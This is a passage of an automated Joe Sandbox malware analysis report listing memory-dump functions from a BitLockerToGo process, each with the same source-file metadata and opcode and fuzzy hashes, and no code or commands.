                                                                                                                                                                                                                                      • Opcode ID: 8626ffc073732245b8d36e8c023c1878140884e2805abc034f17b5317a54fb46
                                                                                                                                                                                                                                      • Instruction ID: 8a08ea6a1607d863eb41450f88e1624530c36dc07e74f1288736b3e653669587
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8626ffc073732245b8d36e8c023c1878140884e2805abc034f17b5317a54fb46
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3211E4800D2E049CB1B873541A45A2BFE25DAB00976ED0CED4D80E3A7D19BC54BEB36
                                                                                                                                                                                                                                      Function 0049AAD1 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b9d5f3e7d00864f37bb282b92d1538ca305d2559219d0fb2d2d083b33f8679a3
                                                                                                                                                                                                                                      • Instruction ID: 3cd9630a49738b4b8f9043f6d980489057e32ffc1325cfd4fa5324e2d83967f7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9d5f3e7d00864f37bb282b92d1538ca305d2559219d0fb2d2d083b33f8679a3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18211D4800D2E058CB1B8B3540A45A2BFE29DAB10D77ED4CED4D80E7A7D1ABC54BE736
                                                                                                                                                                                                                                      Function 0049AD91 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5a77c096af20b64eab4476beaf61b8a484362b3a9602b58bbf5dfb19e38aa10b
                                                                                                                                                                                                                                      • Instruction ID: 7e52ddd11afc72db25bb95ef2a52c2977b0627484c66ef214647f366eb3eb5d4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a77c096af20b64eab4476beaf61b8a484362b3a9602b58bbf5dfb19e38aa10b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6521325800D2E088C717873540A45A2BFE29DAF00D7AED1CED4DC0E7A7D29BC55BEB22
                                                                                                                                                                                                                                      Function 004B0E21 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: acd372f7189516b20c3fb0d5d5e6c2d96e5ed5cb2be7930c09dfb1867a6d4ae4
                                                                                                                                                                                                                                      • Instruction ID: efde90355522b09029903370f0966664c2cb15a2cf75fcd32b0c4cabf6a9523b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: acd372f7189516b20c3fb0d5d5e6c2d96e5ed5cb2be7930c09dfb1867a6d4ae4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F021465800D2E048C717873540A45A2BFE25DAF00D76ED1CED4DC0E3A7D16BC55BEB22
                                                                                                                                                                                                                                      Function 00499161 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6a61b0ddc879259253fba02aeca4f67ec9cd669a367684a2495f0e890360df6c
                                                                                                                                                                                                                                      • Instruction ID: 85653e8b574dd7ca15d0f5c1cbc22b686c9df684755b3c77d35e8206151a2fa3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a61b0ddc879259253fba02aeca4f67ec9cd669a367684a2495f0e890360df6c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6921425800D2E048C713873541A45A2BFE29DAF10D76ED2CEE4DC0E3A7D29BC55BEB22
                                                                                                                                                                                                                                      Function 004AF171 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4f9ec75f0bdae977f5504535ac5eec242330333a800bcadd6d68ff3034b460b8
                                                                                                                                                                                                                                      • Instruction ID: d3dc5fe0ee6e913a3856515f28c2c38507e6e8637019b8bb6733962410f93c3c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f9ec75f0bdae977f5504535ac5eec242330333a800bcadd6d68ff3034b460b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C21424810D2E048CB17873540A45A2BFE29DAF00E76ED1CED4D80E3A7D19BC69BDB36
                                                                                                                                                                                                                                      Function 0049A111 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3f6cbb1155213c4cd0db9b472eedfa5ff828e07afe6a31f1f2162b7e74c8fb02
                                                                                                                                                                                                                                      • Instruction ID: f00924429b768fa3a664852c5b695d2ed649df24f442dad328b5547d091a66b0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f6cbb1155213c4cd0db9b472eedfa5ff828e07afe6a31f1f2162b7e74c8fb02
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6421444800D2E049CB17473540A45A2BFE25DAF00D7AED1CED4D80E3A7D19BC55BDB36
                                                                                                                                                                                                                                      Function 004A1191 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c13bc62158ee4338dcbac896a74e1351acd80cdec8e199aa6459294e7faaf869
                                                                                                                                                                                                                                      • Instruction ID: 0dbba052ff4321a8a81b0dc258afedceacf3f961ac352f7ed818e5276c5450c8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c13bc62158ee4338dcbac896a74e1351acd80cdec8e199aa6459294e7faaf869
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E212C4800D2E049CB1B873540A45A2BFE25DAF00D76ED4CED4D80E3A7D19BC58BEB36
                                                                                                                                                                                                                                      Function 004AF521 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 53ddcf5c7f2818c214c99b7beedebe7827128aa828a37501834e788975066555
                                                                                                                                                                                                                                      • Instruction ID: 35710f9ba289b27fcf7953184c12c62dca2b53e0fef11526a1ce2a8e2b72d378
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53ddcf5c7f2818c214c99b7beedebe7827128aa828a37501834e788975066555
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C421565800D2E048C717873540A85A2BFE25DAF00D76ED1CED4D80E3A7D15BC55BDB22
                                                                                                                                                                                                                                      Function 004B0531 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6d3cec3ec2625e5946bc1fb5c64a5823512d0c5122775119e2339f5116a9609e
                                                                                                                                                                                                                                      • Instruction ID: 83b910d27c87b8bb55a941506350d67efa76c46e9c1b5b7123fe80a1a6c75cb7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d3cec3ec2625e5946bc1fb5c64a5823512d0c5122775119e2339f5116a9609e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34210D4800D2E059CB1B8B3540A45A2BFE25DAB10D77ED1CED4D80E3A7D15BC68BEB36
                                                                                                                                                                                                                                      Function 004AF5C1 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2ee4984e570c19419d87a0236a3ef6bdaf11e84bd898f6455eda3481b569e022
                                                                                                                                                                                                                                      • Instruction ID: 2f43ed0149a5b351d44584249345c52a44c154a41673b5d036bda69e1cdd911d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ee4984e570c19419d87a0236a3ef6bdaf11e84bd898f6455eda3481b569e022
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF21004800D2E059CB1B8B3540A85A2BFE25DAB10D77ED0DED4D80E3A7D157C68BD736
                                                                                                                                                                                                                                      Function 004B05D1 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 59941b07228b143fcfb9d09be14b36a3f25da454f3a7223990178ace3bb8eeb8
                                                                                                                                                                                                                                      • Instruction ID: 0ad5860ec85c9a37d18a5decdaa1cb376e5cc71edc0488c715143826e5a39ed6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59941b07228b143fcfb9d09be14b36a3f25da454f3a7223990178ace3bb8eeb8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5921434800D2E049CB17873540A55A2BFE25DAF00D76ED1CED4D80E3A7D15BC69BDB36
                                                                                                                                                                                                                                      Function 00483641 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 97d6b1aca95e2c660df5e3dbb1b8d3203e5b0ca5093163f0b4464eefbde805d4
                                                                                                                                                                                                                                      • Instruction ID: 93c1c14738d05e8ed021d640a007eb01006043496caed18796547e5179162d99
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97d6b1aca95e2c660df5e3dbb1b8d3203e5b0ca5093163f0b4464eefbde805d4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB21265800D2E058C717833541A45A2BFE25DAF10D76ED1CED4DC0E3A7D29BC59BDB26
                                                                                                                                                                                                                                      Function 004AE7F1 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3878f77761298e92b519e3ed8190308c23b4ff346e711fe8da0b4ca8b8f35674
                                                                                                                                                                                                                                      • Instruction ID: 8ce38a6f5f2f1f600f3c72a27b1e25c673bddfeb7ffe35efb6aea9e527fc6700
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3878f77761298e92b519e3ed8190308c23b4ff346e711fe8da0b4ca8b8f35674
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3521234800E2E049CB17873540A45A2BFE29DAF10E76ED1DED4D80E3A7D15BC69BDB36
                                                                                                                                                                                                                                      Function 004AF7B1 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: eacda5c3258a94a9fd26465e22f31601e18914f34d7937a901f97ce0e573b8e9
                                                                                                                                                                                                                                      • Instruction ID: 7bd826fc58f00fd8c191ff35fa6e04ac624c2f4b43e372a3d57795a0c8809c59
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eacda5c3258a94a9fd26465e22f31601e18914f34d7937a901f97ce0e573b8e9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD21434800D2E048CB17873540A95A2BFE25DAF00E76ED1CED4D80E3A7D15BC69BEB36
                                                                                                                                                                                                                                      Function 004AF851 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4f063a4674157baef5de665d552d95b18ffbda918430561522ea4a66d8d18e0c
                                                                                                                                                                                                                                      • Instruction ID: 11d0dbb1e699edc800bcf0762168697609e5554855f5d0f37d25d42195feb578
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f063a4674157baef5de665d552d95b18ffbda918430561522ea4a66d8d18e0c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3221004800D2E059CB1B8B3540A95A2BFE25DAB10E77ED0DED4D80E3A7D157C68BD736
                                                                                                                                                                                                                                      Function 00499861 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7821035632c39f9b34bc6a3ffa8f447ab908ef4be4bcef5156320ff05c4d90b6
                                                                                                                                                                                                                                      • Instruction ID: 6437e3670fbebdc3ad2202e7515fabd56721fccab3abfa61d9686efed4d656d2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7821035632c39f9b34bc6a3ffa8f447ab908ef4be4bcef5156320ff05c4d90b6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4621534800D2E048C717873540A45A2BFE29DAF00D76ED1CEE4DC0E3A7D29BC59BEB22
                                                                                                                                                                                                                                      Function 004A08A1 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7d398e144ad312b3d1b6c6fb913fb5b1fed9c13244b4a5047b7082ef8a6975b9
                                                                                                                                                                                                                                      • Instruction ID: 2b8d4ccd06e38c6a98a8ec8600785db48141cde86c85b0c03ce2b630993b8656
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d398e144ad312b3d1b6c6fb913fb5b1fed9c13244b4a5047b7082ef8a6975b9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD21534800D2E049CB17873540A45A2BFE39DAF00E76ED1CED4D80E3A7D29BC55BEB26
                                                                                                                                                                                                                                      Function 0049A901 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 0a72ba0964d100c3a7898a769dba10cf46e274c66d6ce4266ad37510e72f346a
                                                                                                                                                                                                                                      • Instruction ID: 100362c6649bc0ca55658712594ae66f44035b48341c466df5cf8a0e8cf7db90
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a72ba0964d100c3a7898a769dba10cf46e274c66d6ce4266ad37510e72f346a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D21204800D2E058CB2B873540A45A2BFE29DAB10D77ED0CED4D80E7A7D1A7C58BD736
                                                                                                                                                                                                                                      Function 00499A81 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3dd9af2196d97b5203e3d2fa86bda06d24bb587dd550971fdd1da318072853b0
                                                                                                                                                                                                                                      • Instruction ID: d569597b45a1519dbee7197f6bcad26f3daf146a13d2071ed96e1bc4af1005aa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3dd9af2196d97b5203e3d2fa86bda06d24bb587dd550971fdd1da318072853b0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B212D4800D2E048CB1B8B3540A45A2BFE25DAB00D77ED1CED4D80E3A7D19BC58BE732
                                                                                                                                                                                                                                      Function 00499C01 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 86e2805e1a7e3653c7a4d7fab8041e399fad201bd1d4a4ccc1676bb56d42ab70
                                                                                                                                                                                                                                      • Instruction ID: f7957b357a0b6cb75cde080e4f737b91c03240be29cdecca3f1ebd10591ff65d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 86e2805e1a7e3653c7a4d7fab8041e399fad201bd1d4a4ccc1676bb56d42ab70
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D21564800D2E058C713833541A45A2BFE25DAF00D76ED1CED4DC0E3A7D29BC55BDB26
                                                                                                                                                                                                                                      Function 004AECC1 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f07ed63be90805d62d5111e61379e6047f03fa985ccadd5e9c850e5579488330
                                                                                                                                                                                                                                      • Instruction ID: 65547fa1cf796dab322f741b830e576036fa199ab15ccdf621632c49291e526b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f07ed63be90805d62d5111e61379e6047f03fa985ccadd5e9c850e5579488330
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7721564800D2E048CB17873540A85A2BFE25DAF00E76ED1CED4D80E3A7D15BC65BDB36
                                                                                                                                                                                                                                      Function 00499D11 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 479a6fb4ad6c91dbc00e9f2b28a51aed196dd4f2d902e796ce0df273010acf8c
                                                                                                                                                                                                                                      • Instruction ID: b9a116037b2312ece683ab24ec43a7c2182e731ba02372e4a45e077396a4d38a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 479a6fb4ad6c91dbc00e9f2b28a51aed196dd4f2d902e796ce0df273010acf8c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31212D4810D2E048CB1B8B3540A45A2BFE25DAB00D77ED0CED4D80E3A7D19BC58BE736
                                                                                                                                                                                                                                      Function 004A0E91 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 47ee7d0bf15ad4ecf7f0b33530e2b4183ddc67670638fb9833748ad3fe0316e6
                                                                                                                                                                                                                                      • Instruction ID: f8a35adf2a0696b0cf9a118817ceb817449eee22b97b140f6f966d24b9c0cb24
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47ee7d0bf15ad4ecf7f0b33530e2b4183ddc67670638fb9833748ad3fe0316e6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E521564800D2E088C713833540A45A2BFE25DAF00D76ED1CED4DC0E3A7D29BC59BEB22
                                                                                                                                                                                                                                      Function 004B1111 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
